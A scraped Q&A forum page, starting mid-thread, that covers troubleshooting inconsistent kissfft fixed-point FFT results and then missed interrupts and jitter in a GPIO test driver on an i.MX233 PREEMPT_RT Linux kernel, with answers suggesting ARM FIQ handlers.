    return 10*log10(noisepow/sigpow + 1e-30);
}
As input, samples of 16-bit sound from the same file are used. Results differ, for example, from -3dB to -15dB. Where could I start troubleshooting?
Possibility #1 (most likely)
You are compiling kissfft.c or kiss_fftr.c differently than the calling code. This happens to a lot of people.
An easy way to force the same FIXED_POINT is to edit kiss_fft.h directly. Another option: verify with some printf debugging, i.e. place the following in various places:
printf( __FILE__ " sees sizeof(kiss_fft_scalar)=%d\n", (int)sizeof(kiss_fft_scalar) );
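If your compiler supports C11, a compile-time variant of the same check (my own sketch) fails the build instead of printing at runtime:
#include "kiss_fft.h"

/* Fails the build of any translation unit whose view of kiss_fft_scalar
 * doesn't match FIXED_POINT 32 (where the scalar is a 32-bit type). */
_Static_assert(sizeof(kiss_fft_scalar) == 4,
               "this file does not see FIXED_POINT=32");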
Possibility #2
Perhaps the FIXED_POINT=16 code works but the FIXED_POINT=32 code does not because something is being handled incorrectly either inside kissfft or on the platform. The 32 bit fixed code relies on int64_t being implemented correctly.
Is that Atheros a 16 bit processor? I know kissfft has been used successfully on 16 bit platforms, but I'm not sure if FIXED_POINT=32 real FFTs on a 16 bit fixed point has been used.
Good luck,
Mark
I have bumped into somewhat inconsistent IRQ/ISR performance on Freescale's i.MX233 running a Linux kernel (3.8.13) with the CONFIG_PREEMPT_RT patches.
I am a little surprised that this processor (ARM9, 454 MHz) is unable to keep up even with 74 kHz IRQ requests..?
In my kernel config I have set following flags:
CONFIG_TINY_PREEMPT_RCU=y
CONFIG_PREEMPT_RCU=y
CONFIG_PREEMPT=y
CONFIG_PREEMPT_RT_BASE=y
CONFIG_HAVE_PREEMPT_LAZY=y
CONFIG_PREEMPT_LAZY=y
CONFIG_PREEMPT_RT_FULL=y
CONFIG_PREEMPT_COUNT=y
CONFIG_DEBUG_PREEMPT=y
On the system (built by Buildroot) there is basically nothing running, and I set a PWM to generate a 74 kHz pulse that serves as the interrupt.
Then in the ISR, I just toggle another GPIO output pin and check the output.
What I find is that sometimes I miss an interrupt:
[scope capture showing the missed interrupt]
Also, the triggering of the output pin seems to be a bit inconsistent; the output pin is usually triggered within a "5% window", which might still be acceptable. But I worry that when I start implementing the data transfer logic, instead of just toggling the pin, I might run into further problems...
My simple driver code looks like this:
// needed includes
uint16_t INPUT_IRQ = 39;
uint16_t OUTPUT_GPIO = 38;
struct test_device *device;

//Prototypes
void irqtest_exit(void);
int irqtest_init(void);
void free_device(void);

//Default functions
module_init(irqtest_init);
module_exit(irqtest_exit);

//triggering flag
uint16_t pulse = 0x1;

irqreturn_t irq_handle_function(int irq, void *device_id)
{
    pulse = !pulse;
    gpio_set_value(OUTPUT_GPIO, pulse);
    return IRQ_HANDLED;
}

struct test_device {
    int huuhaa;
};

void free_device()
{
    if (device)
        kfree(device);
}

int irqtest_init(void)
{
    int result = 0;

    device = kmalloc(sizeof *device, GFP_KERNEL);
    device->huuhaa = 10;

    printk("IRB/irqtest_init: Inserting IRQ module\n");
    printk("IRB/irqtest_init: Requesting GPIO (%d)\n", INPUT_IRQ);

    result = gpio_request_one(INPUT_IRQ, GPIOF_IN, "PWM input");
    if (result != 0) {
        free_device();
        printk("IRB/irqtest_init: Failed to set GPIO (%d) as input.. exiting\n", INPUT_IRQ);
        return -EINVAL;
    }

    result = gpio_request_one(OUTPUT_GPIO, GPIOF_OUT_INIT_LOW, "IR OUTPUT");
    if (result != 0) {
        free_device();
        printk("IRB/irqtest_init: Failed to set GPIO (%d) as output.. exiting\n", OUTPUT_GPIO);
        return -EINVAL;
    }

    //Set our desired interrupt line as input
    result = gpio_direction_input(INPUT_IRQ);
    if (result != 0) {
        printk("IRB/irqtest_init: Failed to set IRQ as input.. exiting\n");
        free_device();
        return -EINVAL;
    }

    //Set flags for our interrupt, guessing here..
    irq_flags |= IRQF_NO_THREAD;
    irq_flags |= IRQF_NOBALANCING;
    irq_flags |= IRQF_TRIGGER_RISING;
    irq_flags |= IRQF_NO_SOFTIRQ_CALL;

    //register interrupt
    result = request_irq(gpio_to_irq(INPUT_IRQ), irq_handle_function, irq_flags, "irq testing", device);
    if (result != 0) {
        printk("IRB/irqtest_init: Failed to reserve GPIO 38\n");
        return -EINVAL;
    }

    printk("IRB/irqtest_init: insert success\n");
    return 0;
}

void irqtest_exit(void)
{
    if (device)
        kfree(device);
    gpio_free(INPUT_IRQ);
    gpio_free(OUTPUT_GPIO);
    printk("IRB/irqtest_exit: Removing irqtest module\n");
}

int irqtest_open(struct inode *inode, struct file *filp) { return 0; }
int irqtest_release(struct inode *inode, struct file *filp) { return 0; }
In the system, I have following interrupts registered, after the driver is loaded:
# cat /proc/interrupts
           CPU0
 16:      36379         -  MXS Timer Tick
 17:          0         -  mxs-spi
 18:       2103         -  mxs-dma
 60:          0  gpio-mxs  irq testing
118:          0         -  mxs-spi
119:          0         -  mxs-dma
120:          0         -  RTC alarm
124:          0         -  8006c000.serial
127:      68050         -  uart-pl011
128:        151         -  ci13xxx_imx
Err:          0
I wonder if the flags I declare for my IRQ are good? I noticed that with this configuration I can no longer reach the console, so the kernel seems totally consumed with servicing this 74 kHz trigger now.. this can't be right?
I suppose it's not a big deal for me since this is only during data transfer, but still I feel I'm doing something wrong..
Also, I wonder if it would be more efficient to map the registers with ioremap, and trigger the output with direct memory writes ?
Is there some way I could raise the priority of the interrupt even higher? Or could I somehow lock the kernel for the duration of the data transfer (~400 ms) and generate my timing for the output some other way?
Edit: Forgot to add /proc/interrupts output to the question...
What you experience here is interrupt jitter. This is to be expected on Linux, because the kernel regularly disables interrupts for various tasks (entering a spinlock, handling an interrupt, etc.).
This will happen regardless of whether you have PREEMPT_RT or not, so expecting to generate a 74 kHz signal with regular interrupts is pretty much unrealistic.
Now, ARM has higher-priority interrupts called FIQs, which Linux never masks or disables.
Linux doesn't use FIQ, and is not built to deal with the fact that an FIQ could be used, so you won't be able to use the generic kernel framework.
From the Linux driver development point of view, however, it's not really different as long as you keep this in mind: you have to write a handler and associate it with an IRQ. You'll also have to poke into the interrupt controller to make it generate an FIQ for the interrupt you want to use (the details on how to change it are platform-dependent; some platforms have functions to do that (like imx25 and mxc_set_irq_fiq), some others don't; imx23/28 don't, so you'll have to do it by hand).
The only catch is that the functions to set up an FIQ handler only work with an assembly-written handler, so you'll have to rewrite your handler in assembly (with your current code, that should be trivial though).
You can find additional details in the blog post Alexandre posted (http://free-electrons.com/blog/fiq-handlers-in-the-arm-linux-kernel/), where you'll find working code, samples, and explanations of how it all works together.
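For orientation only, a heavily hedged sketch of the generic ARM claim/install sequence from arch/arm/kernel/fiq.c (the handler itself must be assembly, and on imx23/28 routing the line to FIQ is the by-hand part mentioned above):
#include <asm/fiq.h>
#include <linux/gpio.h>

extern unsigned char fiq_handler_start, fiq_handler_end;  // bounds of the asm handler

static struct fiq_handler fh = { .name = "irqtest-fiq" };

static int install_fiq(void)
{
    int ret = claim_fiq(&fh);
    if (ret)
        return ret;

    // Copy the assembly handler into the FIQ vector.
    set_fiq_handler(&fiq_handler_start,
                    &fiq_handler_end - &fiq_handler_start);

    // On imx23/28 the interrupt controller must additionally be poked
    // by hand to route this line to FIQ, as explained above.
    enable_fiq(gpio_to_irq(INPUT_IRQ));
    return 0;
}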
You can have a look at what my colleague Maxime Ripard did using an FIQ on a similar SoC (i.mx28) :
http://free-electrons.com/blog/fiq-handlers-in-the-arm-linux-kernel/
Try these flags:
int irq_flags;
...
irq_flags = IRQF_TRIGGER_RISING | IRQF_EARLY_RESUME;
I have kernel 3.8.11 and can't find the IRQF_NO_SOFTIRQ_CALL define. Is it only in 3.8.13?
Also, I didn't see irq_flags defined. Where is it?